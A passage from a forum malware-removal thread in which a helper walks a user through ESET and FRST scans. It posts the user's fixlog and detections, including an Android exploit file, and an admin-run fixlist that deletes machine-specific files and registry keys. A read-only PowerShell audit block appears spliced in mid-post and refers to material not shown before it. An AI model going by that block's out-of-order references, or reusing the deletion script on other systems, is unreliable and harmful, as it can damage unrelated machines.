  • Wait for the scan to finish. Please be patient as this can take some time.
  • Upon completion, click List of found threats. If no threats were found, skip the next two bullet points.
  • Click Export to text file and save the file to your Desktop, naming it something such as "MyEsetScan".
  • Push the Back button.
  • Place a checkmark next to Uninstall application on close and click Finish.
  • Re-enable your anti-virus software.
  • Copy the contents of the log and paste in your next reply.

======================================================

STEP 3
Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • fixlog.txt
  • ESET Online Scan log

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.
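A read-only check of the same browser policy keys the FRST script above removes, added here as an example; it is not part of the thread and not FRST's own code. It assumes an elevated PowerShell prompt and only reports what it finds, so it can be used to confirm the fix took effect or to spot the keys reappearing.

```powershell
# Added example, not part of the thread: a read-only audit of the browser policy keys
# FRST reported as "Restriction". On a standalone (non-domain) PC these keys are normally
# absent; adware creates them to lock the homepage, search provider or IE settings.
# On a domain-joined PC, Group Policy may legitimately populate them, so compare the
# output with what your administrator expects. Run from an elevated PowerShell prompt.

$policyPaths = @(
    'HKLM:\SOFTWARE\Policies\Google',
    'HKLM:\SOFTWARE\Policies\Microsoft\Internet Explorer'
)

# Check the same sub-paths in every loaded user hive (HKU\S-1-5-21-...-<RID>),
# which is where FRST found the third restriction on this machine.
if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
}
$userHives = Get-ChildItem -Path 'HKU:\' |
    Where-Object { $_.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$' }
foreach ($hive in $userHives) {
    $policyPaths += "HKU:\$($hive.PSChildName)\SOFTWARE\Policies\Google"
    $policyPaths += "HKU:\$($hive.PSChildName)\SOFTWARE\Policies\Microsoft\Internet Explorer"
}

function Show-PolicyValues {
    param([Microsoft.Win32.RegistryKey]$Key)
    # Print every value stored directly in this key; Chrome policy names such as
    # HomepageLocation or DefaultSearchProviderSearchURL are the usual adware fingerprints.
    foreach ($name in $Key.GetValueNames()) {
        Write-Output ("    {0} : {1} = {2}" -f $Key.Name, $name, $Key.GetValue($name))
    }
}

foreach ($path in $policyPaths) {
    if (-not (Test-Path -Path $path)) {
        Write-Output "OK       $path (absent)"
        continue
    }
    Write-Output "PRESENT  $path  <-- review; this is the key an FRST fixlist would remove"
    Show-PolicyValues -Key (Get-Item -Path $path)
    # Subkeys too, e.g. Internet Explorer\Restrictions or Internet Explorer\Control Panel.
    Get-ChildItem -Path $path -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object { Show-PolicyValues -Key $_ }
}
```

If a key shows PRESENT again a few reboots after the fix, something still running on the machine is recreating it, which is the pattern the topic starter described with ADWCLEANER results coming back.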



#5 swaykeb00b (Topic Starter, Members, 10 posts)

Posted 27 December 2015 - 11:45 AM

Here's the fixlog:

Fix result of Farbar Recovery Scan Tool (x64) Version:25-12-2015
Ran by Simon (2015-12-27 15:12:19) Run:1
Running from C:\Users\Simon\Downloads
Loaded Profiles: Simon (Available Profiles: Simon)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start
CreateRestorePoint:
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Hosts:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
EmptyTemp:
end
*****************

Restore point was successfully created.
"HKLM\SOFTWARE\Policies\Google" => key removed successfully
Hosts restored successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
"HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully

==== End of Fixlog 15:12:57 ====

and here's the ESET log:

C:\Users\Simon\AppData\LocalLow\Sun\Java\jre1.7.0_67\java_sp.dll	a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application
C:\Users\Simon\Desktop\showbox.apk	a variant of Android/AdDisplay.RevMob.A potentially unwanted application
C:\Users\Simon\Desktop\root\files\libexploit.so	a variant of Android/Exploit.Towel.A trojan
C:\Windows\Installer\MSIE74.tmp	a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AskToolbarInstaller-BTR-V7[1].7z	a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application
D:\AP\WinZip\winzip175mul-32.msi	a variant of Win32/Systweak.L potentially unwanted application
D:\AP\WinZip\winzip175mul-64.msi	a variant of Win32/Systweak.L potentially unwanted application

There you go, and the first name's Simon btw ^^ forgot to tell in my previous reply. The ESET log came up with some concerning results, do I have a trojan of some sort?

One more thing I'd like to point out: I've bought Malwarebytes since I started this post and it keeps coming up with warnings about firefox.exe. I checked the network exceptions whitelist and it was filled with these ad sites; I removed them all and it seems to block 50% of the ads popping up.


Edited by swaykeb00b, 27 December 2015 - 11:53 AM.


#6 Machiavelli (Agent 007, Malware Response Instructor, 4,114 posts, Germany)

Posted 28 December 2015 - 03:08 PM

Hey Simon, nice to meet you. :)

The ESET log came up with some concerning results, do I have a trojan of some sort?

Just some Adware, nothing to worry about. ;)

One more thing I'd like to point out: I've bought Malwarebytes since I started this post and it keeps coming up with warnings about firefox.exe. I checked the network exceptions whitelist and it was filled with these ad sites; I removed them all and it seems to block 50% of the ads popping up.

Could you explain that in detail please.

STEP 1

Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key + r on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
    start
    CreateRestorePoint:
    C:\Users\Simon\AppData\LocalLow\Sun\Java\jre1.7.0_67\java_sp.dll
    C:\Users\Simon\Desktop\showbox.apk
    C:\Users\Simon\Desktop\root\files\libexploit.so
    C:\Windows\Installer\MSIE74.tmp
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AskToolbarInstaller-BTR-V7[1].7z
    D:\AP\WinZip\winzip175mul-32.msi
    D:\AP\WinZip\winzip175mul-64.msi
    EmptyTemp:
    end
  • Click File > Save As and type fixlist.txt as the File Name
  • Important: The file must be saved in the same location as FRST64.exe. 

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. Copy the contents of the log and paste in your next reply.

STEP 2
Farbar Recovery Scan Tool (FRST) Scan

  • Right-Click FRST.exe or FRST64.exe and select Run as administrator to run the programme.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply. 

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.



#7 Machiavelli (Agent 007, Malware Response Instructor, 4,114 posts, Germany)

Posted 07 January 2016 - 11:01 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.
